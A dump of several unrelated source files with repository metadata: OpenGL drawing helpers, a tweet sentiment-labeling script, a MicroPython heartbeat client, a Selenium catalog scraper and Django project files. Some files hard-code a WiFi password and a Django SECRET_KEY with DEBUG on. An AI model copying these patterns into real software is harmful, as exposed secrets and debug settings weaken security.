    return (screen_pt.x < -margin or
            screen_pt.y < -margin or
            screen_pt.x > SCREEN_WIDTH + margin or
            screen_pt.y > SCREEN_HEIGHT + margin)
def adjust_for_cam(point):
    """Map a world-space point to screen space using the camera position
    (SPACE.last_pos) and zoom (SPACE.scale)."""
    return (point - SPACE.last_pos) * SPACE.scale + SCREEN_CENTER
def inverse_adjust_for_cam(point):
    """Map a screen-space point back to world space; exact inverse of
    adjust_for_cam()."""
    return (point - SCREEN_CENTER) / SPACE.scale + SPACE.last_pos
def draw_rect(texture, points, direction=0, use_cam=True):
    """Draw an alpha-blended textured quad through the four *points*.

    texture   -- GL texture id to bind for the quad.
    points    -- iterable of 4 vertices (world coords when use_cam, else
                 screen coords).
    direction -- offsets which corner receives which texture coordinate.
    use_cam   -- when True, transform vertices through the camera first.
    """
    # Set the texture
    gl.glEnable(gl.GL_TEXTURE_2D)
    gl.glBindTexture(gl.GL_TEXTURE_2D, texture)
    # Allow alpha blending
    gl.glEnable(gl.GL_BLEND)
    gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
    # draw
    gl.glBegin(gl.GL_QUADS)
    for i, vert in enumerate(points):
        b = (i + direction) % 4  # render according to the direction
        if use_cam:
            x, y = adjust_for_cam(vert)
        else:
            x, y = vert
        # Fix: use a dedicated name for the texture coordinate instead of
        # rebinding the 'texture' parameter inside the loop (shadowing).
        tex_coord = b // 2, ((b + 1) // 2) % 2
        gl.glTexCoord2f(*tex_coord)
        gl.glVertex3f(x, y, 0)
    gl.glEnd()
def draw_large_point(texture, p, r):
    """Draw a textured, axis-aligned square of half-width *r* centred on
    point *p* (a convenience wrapper around draw_rect)."""
    draw_rect(texture, [Vec2d(p.x - r, p.y - r),
                        Vec2d(p.x + r, p.y - r),
                        Vec2d(p.x + r, p.y + r),
                        Vec2d(p.x - r, p.y + r),])
|
[
"[email protected]"
] | |
2ac6b76fcb536907f37c5e2b85d1aa4c1145f25d
|
c8cd0d24b50da3497133799c2612bea3108f09b9
|
/sentiment-analysis/src/labeler.py
|
7060b5289ce0301dd898a00252b67fdb52177de2
|
[] |
no_license
|
TravisDunlop/colombia-elections-twitter
|
d61e08e4bbeb3a6357faee30f17d7037112eeb34
|
df42d536ed27a9f9cb65d9c61d0fd9b6e35d4217
|
refs/heads/master
| 2020-03-16T03:53:34.196212 | 2018-05-19T15:10:35 | 2018-05-19T15:10:35 | 132,498,270 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,387 |
py
|
import pandas as pd
import numpy as np
import os
import json
import re
import gc
import pickle
# Pandas display tweaks so full tweet text is visible while labeling.
pd.set_option('display.max_colwidth', -1)
pd.set_option('display.float_format', lambda x: '%.0f' % x)
# NOTE(review): machine-specific absolute paths; adjust before running.
data_path = "/home/juan/Desktop/Text_Mining/Om_Project/Data"
tables_path = "/home/juan/Desktop/Text_Mining/Om_Project/colombia-elections-twitter/sentiment-analysis/tables"
# One-off sampling step that produced data_labeling.csv (kept for reference):
# reader_ = pd.read_csv ( os.path.join( data_path,"db_tweets.csv" ) , sep = "|", lineterminator = '\n')
# data_ = reader_.sample(5000)
# data_.to_csv(os.path.join(data_path,"data_labeling.csv"),index=False,sep='|')
# del reader_
# The sampled tweets to be labeled by hand.
data_labels = pd.read_csv ( os.path.join( data_path,"data_labeling.csv" ) ,
                            sep = "|",
                            lineterminator = '\n' )
#
# sentiment_label = []
# tweet_id = []
#
# with open(os.path.join(data_path,"sentiment_labels"), 'wb') as fp:
# pickle.dump(sentiment_label, fp)
# fp.close()
# with open(os.path.join(data_path,"tweet_id"), 'wb') as fp:
# pickle.dump(tweet_id, fp)
# fp.close()
# Resume support: load the labels saved by a previous session.
with open(os.path.join(tables_path,"sentiment_labels"), 'rb') as fp:
    sentiment_label = pickle.load(fp)
fp.close()  # redundant: the with-block already closed fp
with open(os.path.join(tables_path,"tweet_id"), 'rb') as fp:
    tweet_id = pickle.load(fp)
fp.close()
# Skip past the last tweet labeled in the previous session.
if len(tweet_id)!=0:
    start = data_labels.index[ data_labels.tweet_id == tweet_id[-1]].tolist()[0]+1
else:
    start = 0
data_labels = data_labels.iloc [ start: , : ]
# data_labels.columns
# Interactive labeling loop: show a tweet, read 0/1/99; 'END' stops early.
for i in range( data_labels.shape[0] ):
    print(data_labels.iloc[i,:][["created_at","text_tweet","hashtags","user_description","screen_name"]])
    label = []
    while label not in ["0", "1","99","END"]:
        label = input ( "\n\n#####\nlabels:\n1-positive\n0-negative\n99-unclear/neutral\n------\nbreak it with 'END': " )
    if label == "END":
        break
    else:
        sentiment_label.append( int( label ) )
        tweet_id.append( data_labels.tweet_id.iloc[i] )
    print ( "__________" )
# Persist the (possibly extended) label lists for the next session.
with open(os.path.join(tables_path,"sentiment_labels"), 'wb') as fp:
    pickle.dump(sentiment_label, fp)
fp.close()
with open(os.path.join(tables_path,"tweet_id"), 'wb') as fp:
    pickle.dump(tweet_id, fp)
fp.close()
# Leftover chunked-sampling experiment (kept commented out):
# i = np.random.randint(low=0,high = 6)
# j = 0
# for chunk in reader_:
# if j == i:
# break
# j=+1
#
# my_df_chunk = chunk.sample(2000)[["tweet_id","text_tweet","user_description"]]
|
[
"[email protected]"
] | |
531883721f517129ade5b59be0c33d3e18cdb738
|
7717039d2c8ace6250282b76bf6b0b3ced7bf241
|
/tests/urequests+requests测试/掌控板urequests heartbeat post测试(oled显示).py
|
a27c5834a99329dbb16591941b13e07a9fbc64b8
|
[
"MIT"
] |
permissive
|
SZ2G-RoboticsClub/SmartCrutch-DemoBoard
|
ae07c80d51f554b09ad99852c03f85dd04c42615
|
0d32acc9c934b384612a721ecde0259c8d90a82d
|
refs/heads/main
| 2023-09-01T07:39:17.465666 | 2021-10-17T02:37:10 | 2021-10-17T02:37:10 | 347,536,775 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,225 |
py
|
from mpython import *
import urequests
import network
import time
# import ntptime
# Board setup (mpython / MicroPython handheld).
my_wifi = wifi()
my_wifi.connectWiFi('QFCS-MI', '999999999')  # NOTE(review): hard-coded SSID/password
# ntptime.settime(8, "time.windows.com")
oled.fill(0)
oled.DispChar('初始化成功', 0, 0)  # screen text: "initialisation succeeded"
oled.show()
BASE_URL = 'http://192.168.31.132:8000/demoboard'  # LAN demo server endpoint
uuid = 'dytest'  # device identifier sent in every heartbeat
status = 'ok'    # current device status; 'emergency' while button A is held
# heartbeat_Loc = None
# heartbeat_time = None
time_set = None  # start time of the current heartbeat window
lock = 0         # NOTE(review): appears unused in this file - confirm before removing
def heartbeat():
    """Send one heartbeat POST to the server and keep the parsed JSON reply.

    Reads the module-level ``uuid``, ``status`` and ``heartbeat_Loc`` globals,
    stores the payload in ``data`` and the decoded response in ``resp`` so the
    main loop can display them.
    """
    global uuid, status, heartbeat_Loc, heartbeat_time, data, resp
    data = {
        "uuid": uuid,
        "status": status,
        "loc": heartbeat_Loc
    }
    print(data)
    resp = urequests.post(url=BASE_URL + '/heartbeat', json=data)
    resp = resp.json()
# Announce that the main loop is starting, then clear the display.
oled.fill(0)
oled.DispChar('开始循环', 0, 0)
oled.show()
time.sleep(2)
oled.fill(0)
oled.show()

# Main loop: poll the panic button continuously; every 5 seconds send a heartbeat.
# NOTE(review): indentation was mangled in the source dump — the nesting below
# (location/status reset inside the else-branch) is reconstructed; confirm.
while True:
    if time_set == None:
        # Start a new 5-second heartbeat window.
        time_set = time.time()
    # print('没有问题1')
    if button_a.is_pressed():
        # Panic button held: white LEDs on and report an emergency.
        rgb.fill( (int(255), int(255), int(255)) )
        rgb.write()
        status = 'emergency'
    else:
        rgb.fill( (0, 0, 0) )
        rgb.write()
        # heartbeat_time = None
        # Hard-coded demo location; a real device would read a GPS fix here.
        heartbeat_Loc = {"latitude": 22.576035, "longitude": 113.943418, "info": 'ahhhhhh'}
        # heartbeat_Loc = {"latitude": 22.576035, "longitude": 113.943418}
        status = 'ok'
    # print('没有问题2')
    # print(time.time() - time_set)
    if time.time() - time_set >= 5:
        # Window elapsed: send the heartbeat and show the reply on the OLED.
        heartbeat()
        oled.fill(0)
        oled.DispChar(str(data.get('status')), 0, 0)
        oled.DispChar(str(resp), 0, 16, 1, True)
        oled.show()
        print(resp)
        # Reset state for the next heartbeat window.
        time_set = None
        status = 'ok'
        heartbeat_Loc = None
        # heartbeat_time = None
        print('没有问题3')
        if resp.get('code') == 0:  # server accepted the heartbeat
            continue
        elif resp.get('code') == 1:  # device unknown to the server
            print('拐杖未注册')
        else:
            # Any other code: show a heartbeat-error message.
            oled.fill(0)
            oled.DispChar('心跳包错误', 0, 0, 1)
            # oled.DispChar(str(resp.get('msg')), 0, 16, 1, True)  #查看是否正常回应
            oled.show()
|
[
"[email protected]"
] | |
885be927b82ec91f5a3ed0442cef540e1f29a5c5
|
3514d1fd4f54f013ad39c55bb72cb997ab3b32c2
|
/cosmos_scrapy-master/cosmos_scrapy/spiders/safetyspider.py
|
9c8122e32ab4d2678effa8fdbb72776d9ffb0fa8
|
[] |
no_license
|
609189660/Data-Crawling
|
ba262ec2fea4ce48d0ad24e52dc667f4a7fe5178
|
5fdbe9b81b1c97be61fcd4fd2cf3aeab5ab26f12
|
refs/heads/master
| 2020-12-02T23:19:03.412377 | 2019-12-31T21:25:18 | 2019-12-31T21:25:18 | 231,147,405 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,998 |
py
|
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy import Spider, FormRequest
import scrapy
from selenium import webdriver
from scrapy.selector import Selector
from scrapy.http import Request
from selenium.common.exceptions import NoSuchElementException
import re
from time import sleep
from random import randint
import pandas as pd
from pymongo import MongoClient
import random
from selenium.webdriver.common.keys import Keys
from collections import Counter
from collections import defaultdict
from datetime import datetime
import numpy as np
import random
from collections import Counter
def click_make(driver, make):
    """Open the catalog page and pick *make* in the maker dropdown.

    Navigates to the traditional-catalog page, enters its menu iframe and
    clicks the <option> whose visible text equals *make*.
    """
    driver.get('http://www.safetyautoparts.com/webcatalog/tradcatalog.html')
    menu_frame = driver.find_element_by_name('menuFrame')
    driver.switch_to_frame(menu_frame)
    option_xpath = "//option[text()='" + make + "']"
    driver.find_element_by_xpath(option_xpath).click()
def click_engine(driver, enginecode):
    """Click the engine <option> whose value attribute equals *enginecode*.

    Assumes the driver is already inside the catalog's menu frame.
    """
    option_xpath = "//option[@value='" + enginecode + "']"
    driver.find_element_by_xpath(option_xpath).click()
def save_html_source(carmake, enginecode, enginename, html):
    """Persist one scraped catalog page into MongoDB (safety.html_page)."""
    client = MongoClient('mongodb://localhost:27017')
    record = {
        'car_make': carmake,
        'engine_code': enginecode,
        'engine_name': enginename,
        'html': html,
    }
    client.safety.html_page.insert_one(record)  # save the page in the collection
    client.close()
def read_csv():
    """Load the application table and return (maker list, full DataFrame).

    The maker list is hard-coded (a curated subset/ordering of the makers in
    the CSV) rather than derived from the file.
    """
    file_location = 'C:/Users/Server/PycharmProjects/cosmos_scrapy/cosmos_scrapy/spiders/jis_application_final.csv'
    df = pd.read_csv(file_location)
    # Makers still targeted for scraping, in the order they should be visited.
    makelist = [
        'Isuzu', 'Mitsubishi',
        'Nissan', 'Subaru', 'Suzuki', 'Acura', 'Infiniti', 'Hyundai',
        'Kia', 'Lexus', 'Nissan Ind/UD Trucks', 'Isuzu Industrial', 'Daihatsu', 'Scion',
        'Mitsubishi Ind/Fuso', 'Chrysler Trucks', 'Daewoo', 'Ford Trucks',
        'Chrysler Cars', 'Mazda Industrial', 'Toyota Ind/Hino', 'Ford Cars', 'GM Industrial', 'Saab',
        'GM Cars', 'GM Trucks',
    ]
    return makelist, df
# makelist=read_csv()
# print(makelist)
# random.shuffle(makelist)
# print(len(makelist))
def filter_out_scrapied_engine(enginelist):
    """Return the engines in *enginelist* that have no saved page in MongoDB.

    Prints each engine that still needs scraping, as a progress aid.
    """
    client = MongoClient('mongodb://localhost:27017')
    saved_pages = client.safety.html_page.find({})
    already_done = [page_dict['engine_code'] for page_dict in saved_pages]
    pending = []
    for engine in enginelist:
        if engine in already_done:
            continue
        print(engine)
        pending.append(engine)
    return pending
# makelist,df=read_csv()
# engine_list = df.loc[df['maker'] == 'Mazda', 'engine_number'].tolist()
# engine_list[7]= 'NA'
# print(len(engine_list))
# print(engine_list)
# engine_list= ['1KC', '3KC', '4KC', '4KE', '2E', '13AC', '3AC', '3E', '3EE', '5EFE', '1NZFE', '2TC', '4AC', '4ALC', '4AGEC', '4AGE', '4AGELC', '4AGZE', '4AF', '4AFE-1', '4AFE-2', '3TC', '7AFE', '1ZZFE', '2ZZGE', '2ZRFE', '1CLC', '1CTLC', '3RC', '8RC', '18RC', '21R', '2CTLC', '2SELC', '1VZFE', '3YEC', '3SGELC', '3SGTE', '3SFE', '3SFE-RAV4', '1AZFE', '4UGSE', '5SFE', '1L', '20R', '4YEC', '2M', '22R-E', '22R', '22RE', '22RTEC', '2TZFE', '2TZFZE', '2RZFE', '2AZFE', '2L', '2LT', '2ARFE', '2VZFE', '4M', '4ME', '2TRFE', '3RZFE', '1ARFE', '5ME', '5MGE', '7MGE', '7MGTE', '3VZE', '3VZFE', '1MZFE', '2JZGE', '2JZGTE', '3MZFE', '5VZFE', '2GRFE', '2GRFKS', '1F', '3FE', '1GRFE', '2F', '1FZFE', '1URFE', '2UZFE', '3URFE']
# print(filter_out_scrapied_engine(engine_list))
# np.random.shuffle(engine_list)
def filter_out_scrapied_make(makelist, df):
    """Return the makers from *makelist* that still have unscraped engines.

    A maker is kept if it has no saved pages at all, or if the number of
    saved engine pages differs from the number of engines listed for it in
    the application table *df*.
    """
    client = MongoClient('mongodb://localhost:27017')
    result = client.safety.html_page.find({})
    searched_make = [page_dict['car_make'] for page_dict in result]
    #searched_make does not change so result is used once not like result2 below
    # print(searched_make)
    # result2 = client.safety.html_page.find({})
    # searched_engine1 = [page_dict['engine_code'] for page_dict in result2]
    # print(searched_engine1)
    # result2 = client.safety.html_page.find({})
    not_searched_make = []
    # makelist=['Mitsubishi','Nissan']
    for make in makelist:
        # print(make)
        # count_from_db = client.safety.html_page.find({'car_make':make}).count()
        # print (count_from_db)
        result2 = client.safety.html_page.find({})
        # find() function return a cursor to the db so we need to activate every time make change
        searched_engine = [page_dict['engine_code'] for page_dict in result2 if page_dict['car_make']==make]
        # print(searched_engine)
        enginelist = df.loc[df['maker'] == make, 'engine_number'].tolist()
        # print(len(searched_engine))
        # print(len(enginelist))
        # print("")
        if make not in searched_make:
            # print(make)
            not_searched_make.append(make)
        elif len(searched_engine)!=len(enginelist):
            # Partially scraped maker: revisit it to pick up the missing engines.
            not_searched_make.append(make)
            # print(len(searched_engine))
            # print(len(enginelist))
        # else:
        #     # print(engine)
        #     continue
    return not_searched_make
# makelist, df = read_csv()
# print(filter_out_scrapied_make(makelist,df))
def get_engine_code_list(df, make):
    """Return every engine_number listed for *make* in the application table."""
    rows_for_make = df.loc[df['maker'] == make]
    return rows_for_make['engine_number'].tolist()
# make='Toyota'
# makelist,df=read_csv()
# print(get_engine_code_list(df,make))
def frame_switch(driver, name):
    """Switch the webdriver's context into the iframe named *name*."""
    target_frame = driver.find_element_by_name(name)
    driver.switch_to.frame(target_frame)
def amount_of_download():
    """Count how many application rows the source CSV holds per maker."""
    file_location = 'C:/Users/Server/PycharmProjects/cosmos_scrapy/cosmos_scrapy/spiders/jis_application_final.csv'
    makers = pd.read_csv(file_location)["maker"].tolist()
    return Counter(makers)
# print(amount_of_download())
class safetyspider(Spider):
    """Selenium-driven spider that saves Safety Auto Parts catalog pages.

    For each pending maker/engine pair it selects the dropdown entries,
    captures the results frame's HTML and stores it in MongoDB, throttling
    itself with long sleeps to avoid hammering the site.

    NOTE(review): indentation was mangled in the source dump — the loop
    nesting below is reconstructed; confirm against the original file.
    """
    name = "safety"
    count = 0  # pages saved during this run; drives the throttling breaks

    def start_requests(self):
        file_location = 'C:/Users/Server/Downloads/chromedriver_win32/chromedriver.exe'
        # total_searched_itmes = 0
        self.driver = webdriver.Chrome(file_location)
        # self.driver.maximize_window()
        # self.driver.set_window_size(2000,2500)
        # global base_url
        # tag = 'rareelectrical_generator_search_page'
        # self.driver.get(base_url)
        sleep(5)
        self.driver.get('http://www.safetyautoparts.com/webcatalog/tradcatalog.html')
        makelist, df = read_csv()
        # Only visit makers that still have unscraped engines.
        makelist = filter_out_scrapied_make(makelist, df)
        # makelist=np.random.shuffle(makelist)
        print(makelist)
        for make in makelist:
            # self.driver.get('http://www.safetyautoparts.com/webcatalog/tradcatalog.html')
            sleep(randint(5, 10))
            click_make(self.driver, make)
            sleep(randint(5, 10))
            print('make:' + make)
            enginelist = get_engine_code_list(df, make)
            # enginelist[7]='NA'
            # print('enginelist:'+enginelist)
            enginelist = filter_out_scrapied_engine(enginelist)
            if enginelist is None:
                continue
            # print('filtered list:'+enginelist)
            # Randomize visit order so repeated runs don't look robotic.
            np.random.shuffle(enginelist)
            # print('shuffled lsit:'+enginelist)
            # self.count= self.count + 1
            # print('total scrapied item:'+self.count)
            # if self.count > 3:
            #     raise scrapy.exceptions.CloseSpider('------end of scrapy')
            # if len(enginelist)==0:
            #     continue
            for engine in enginelist:
                # print(engine)
                click_engine(self.driver, engine)
                sleep(randint(5, 10))
                carmake = make
                enginecode = engine
                enginename = self.driver.find_element_by_xpath("//option[@value='" + engine + "']").text
                # The results render in a sibling frame; grab its HTML then
                # return to the menu frame for the next engine selection.
                self.driver.switch_to.default_content()
                frame_switch(self.driver, 'resultsFrame')
                html = self.driver.page_source
                self.driver.switch_to.default_content()
                frame_switch(self.driver, 'menuFrame')
                save_html_source(carmake, enginecode, enginename, html)
                print("save success: " + enginecode)
                self.count = self.count + 1
                print('This run scrapied item:' + str(self.count))
                # Throttle: hour-long breaks at 20 and 40 pages, stop at 50.
                if self.count == 20:
                    sleep(randint(3600, 3700))
                elif self.count == 40:
                    sleep(randint(7200, 7300))
                elif self.count >= 50:
                    raise scrapy.exceptions.CloseSpider('------end of scrapy')
            sleep(randint(300, 600))
        raise scrapy.exceptions.CloseSpider('------end of scrapy')
|
[
"[email protected]"
] | |
00a25c59ba966ef3a5689248861ee91039bece15
|
ab027e5be1181bd0e55bbb80a1c27cff93318483
|
/urlis/manage.py
|
38e31523f5f7810ccfbba35e072068950b9bd006
|
[] |
no_license
|
miri-san-so/Urlis
|
e1d1961c3510d14c1e8b8fd1c5b10a85842afed8
|
e48477682ed861b237958cf219e4d7db6f520d41
|
refs/heads/master
| 2021-05-28T23:54:25.470278 | 2020-04-09T06:25:08 | 2020-04-09T06:25:08 | 254,288,791 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 646 |
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys


def main():
    """Run a Django management command taken from ``sys.argv``."""
    # Point Django at this project's settings before dispatching the command.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'urlis.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Re-raise with a friendlier hint; the original error stays chained.
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
f4429fdafc52467555a79089f8af89d3f9c0d2f6
|
92edc96cfdd42463868d1106f703b8cd229d0369
|
/fractal tree.py
|
7ff575521494e8396b816eb3df88fe0cf017fd8b
|
[] |
no_license
|
jiangnandekafuka/python
|
75e5203d6142755f6efed4749a98240cb593a386
|
85edaa3b2d7e07071bb9c393e8f745d480e09e78
|
refs/heads/master
| 2020-09-02T17:57:13.593638 | 2019-11-06T15:27:57 | 2019-11-06T15:27:57 | 219,274,908 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 236 |
py
|
"""
作者:李亮亮
功能:分形树绘制
版本号:1.0
日期:2019/7/8
新增功能:使用循环和递归绘制分形树
"""
import turtle
def main():
"""
主函数
"""
if __name__=='__main__':
main()
|
[
"[email protected]"
] | |
e26c9e3d12ba904f4b5590c36fce0d8b72232a86
|
af23581c3f0088764d03e58daac8660a763520c5
|
/process_txt/translate.py
|
cc7a9dc5e986b4122938569ce96ed3e7df270367
|
[] |
no_license
|
log1206/evaluation_matrix_graph_generator
|
7d1b82cc0848f857e5e7e60625bfac302a121f86
|
51c146086fc575d041e4a77a7bcffea15e046f40
|
refs/heads/master
| 2022-11-04T21:56:13.508189 | 2020-06-22T11:37:47 | 2020-06-22T11:37:47 | 274,119,629 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,323 |
py
|
import re
f = open("usage.txt","r",encoding="utf-16")
f0 = open("time.txt","w",encoding="utf-16")
f1 = open("mem.txt","w",encoding="utf-16")
f2 = open("cpu.txt","w",encoding="utf-16")
f3 = open("gpu.txt","w",encoding="utf-16")
f4 = open("gpu_mem.txt","w",encoding="utf-16")
"""
try:
while True:
contents = f.readline()
except EOFError:
pass
"""
## read time and process
contents = f.readline()
str_no_dot = contents.split(".")
strr =str_no_dot[0]
time = int(strr)
current = time - time
f0.writelines(str(current)+"\n")
## first time for each
contents = f.readline()
f1.writelines(contents)
contents = f.readline()
f2.writelines(contents)
contents = f.readline()
f3.writelines(contents)
contents = f.readline()
f4.writelines(contents)
contents = f.readline()
##loop process
while True:
contents = f.readline()
if contents == '':
break
str_no_dot = contents.split(".")
strr =str_no_dot[0]
current = int(strr)
current =current -time
f0.writelines(str(current)+"\n")
contents = f.readline()
f1.writelines(contents)
contents = f.readline()
f2.writelines(contents)
contents = f.readline()
f3.writelines(contents)
contents = f.readline()
f4.writelines(contents)
contents = f.readline()
if contents == '':
break
|
[
"[email protected]"
] | |
b0593bc623f07101fd1c4aac9dd0a4ebc0980eb2
|
955b968d46b4c436be55daf8aa1b8fc8fe402610
|
/ch04/set_window_size.py
|
110459bc02e4e910978194acc115ddfccc6554d7
|
[] |
no_license
|
han-huang/python_selenium
|
1c8159fd1421b1f0e87cb0df20ae4fe82450f879
|
56f9f5e5687cf533c678a1c12e1ecaa4c50a7795
|
refs/heads/master
| 2020-03-09T02:24:48.882279 | 2018-04-07T15:06:18 | 2018-04-07T15:06:18 | 128,535,917 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 265 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from selenium import webdriver
driver = webdriver.Firefox()
driver.get("https://mail.google.com")
# 參數字為像素點
print("設定瀏覽器寬480 高800顯示")
driver.set_window_size(480, 800)
# driver.quit()
|
[
"vagrant@LaravelDemoSite"
] |
vagrant@LaravelDemoSite
|
98c2bc89454f0f4bd6d7b33b7d317117b7910b88
|
8523e8b59ac75c07736ae72f0ee90d88fbe40fed
|
/Bookstore/Bookstore/settings.py
|
143b0f30dd8f11ae2d579ee6ba8b0e3358fbf52f
|
[] |
no_license
|
Sov-JC/SoftwareEngineering
|
daaad391102b5f9a490c0deb1a724c41270809cc
|
eb5243cdef0bd65bdcf32fb3a0ae812cf9ae238e
|
refs/heads/master
| 2020-03-18T00:44:50.324008 | 2018-07-28T03:35:28 | 2018-07-28T03:35:28 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,435 |
py
|
"""
Django settings for Bookstore project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR = os.path.join(BASE_DIR, "templates")
STATIC_DIR = os.path.join(BASE_DIR, "static")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(e9%r0d4uu2crhx)*ekk(1v@sr$gn*-p-qkcn6f%(5h3pskjmc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'myCart',
#'comment',
'homepage',
#'search', #remove this
'prof',
'database',
'products',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Bookstore.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Bookstore.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
STATIC_DIR,
]
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
MEDIA_URL = '/media/'
|
[
"[email protected]"
] | |
bb4b43d08b89cebc31af388294610f1431075c49
|
b89780aaa5271b7220330cc85ddae132530aae49
|
/unity_bundles/serializers.py
|
500ee1622f5cd15ea03a8705003b497fbac29a6e
|
[] |
no_license
|
feliamunda/living_walls_api
|
4bbbc925154c4963f9c3196d8ba1bf5733a7bdbd
|
1182c26ee7e06ff1958a9100482f81d21b32cfff
|
refs/heads/master
| 2023-08-03T02:12:11.777153 | 2021-09-19T02:18:48 | 2021-09-19T02:18:48 | 408,005,868 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 375 |
py
|
from django.db.models import fields
from rest_framework import serializers

from .models import Asset


class AssetSerializer(serializers.Serializer):
    """Validates and creates Asset records (a named Unity asset-bundle upload)."""

    name = serializers.CharField(max_length=70)
    bundle = serializers.FileField()

    class Meta:
        # NOTE(review): plain serializers.Serializer does not read Meta.model —
        # it is only used by create() below; presumably ModelSerializer was
        # intended. Confirm before relying on Meta-driven field generation.
        model = Asset

    def create(self, validated_data):
        # Persist a new Asset from the validated input fields.
        return self.Meta.model.objects.create(**validated_data)
|
[
"[email protected]"
] | |
13a119cadbd0faa4e12dfb1a370603ff73f1149c
|
281cec8c8a093c5e73ba17b9a96325acc225d406
|
/code_which_works.py
|
f6af1a8bc7852c0a3f84264abcd68402a75434f0
|
[] |
no_license
|
zahessi/pygame_pong
|
cd86a8b39891f06fc90e760449f69fb03c1b37c9
|
d33be1995768fc87c4406590d149957fc65950bc
|
refs/heads/master
| 2020-04-15T12:10:10.741786 | 2019-01-09T21:50:37 | 2019-01-09T21:50:37 | 164,662,741 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 205 |
py
|
from classes import Game


def main():
    """Create the game, build its object pool, and run the update loop forever."""
    game = Game()
    object_pool = game.setup_game()
    while True:
        game.update_game_screen(*object_pool)


if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
3df0ea853c5c6f446d2fcad384c523b533d6f0b0
|
038cb642f628adca4bcc129111c9f37f1331642c
|
/home/migrations/0003_auto_20210213_1642.py
|
ae2dba8126dab5ca2c13c350d94af864a9f8d9ef
|
[] |
no_license
|
dieudo25/tf_app
|
82edbe744d4764ada0df643f4869bc3526d4b110
|
ff836c59bd27fbd15db478ef7b654e58a59ca94f
|
refs/heads/master
| 2023-04-03T21:17:04.368434 | 2021-02-17T13:03:10 | 2021-02-17T13:03:10 | 338,341,550 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 730 |
py
|
# Generated by Django 3.1 on 2021-02-13 16:42

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    """Rename banner_cta -> banner_cta_1 and add a second CTA page link."""

    dependencies = [
        ('wagtailcore', '0060_fix_workflow_unique_constraint'),
        ('home', '0002_auto_20210213_1630'),
    ]

    operations = [
        # Rename (rather than drop/re-add) so existing CTA data is preserved.
        migrations.RenameField(
            model_name='homepage',
            old_name='banner_cta',
            new_name='banner_cta_1',
        ),
        # Optional second call-to-action; SET_NULL keeps the homepage if the
        # linked wagtail page is deleted.
        migrations.AddField(
            model_name='homepage',
            name='banner_cta_2',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailcore.page'),
        ),
    ]
|
[
"[email protected]"
] | |
ecf28c8b348c9f90a067ed024a81f8d03474e056
|
